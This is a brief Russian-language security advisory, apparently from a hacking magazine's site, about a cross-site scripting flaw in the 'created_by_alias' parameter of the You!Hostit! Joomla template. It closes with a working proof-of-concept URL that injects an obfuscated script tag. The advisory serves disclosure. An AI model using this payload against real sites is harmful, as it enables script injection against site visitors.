Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
Программа: You!Hostit! (template for Joomla)
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "created_by_alias" сценарием index.php. Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.
Эксплоит:
http://server.extension/path/?created_by_alias=%00'%22%3E%3CScRiPt%20%0a%0d%3E
alert(123456)%3B%3C/ScRiPt%3E&title=111-222-1933andresg888@gmail.com& text=111-222-1933andresg888@gmail.com&Submit=Submit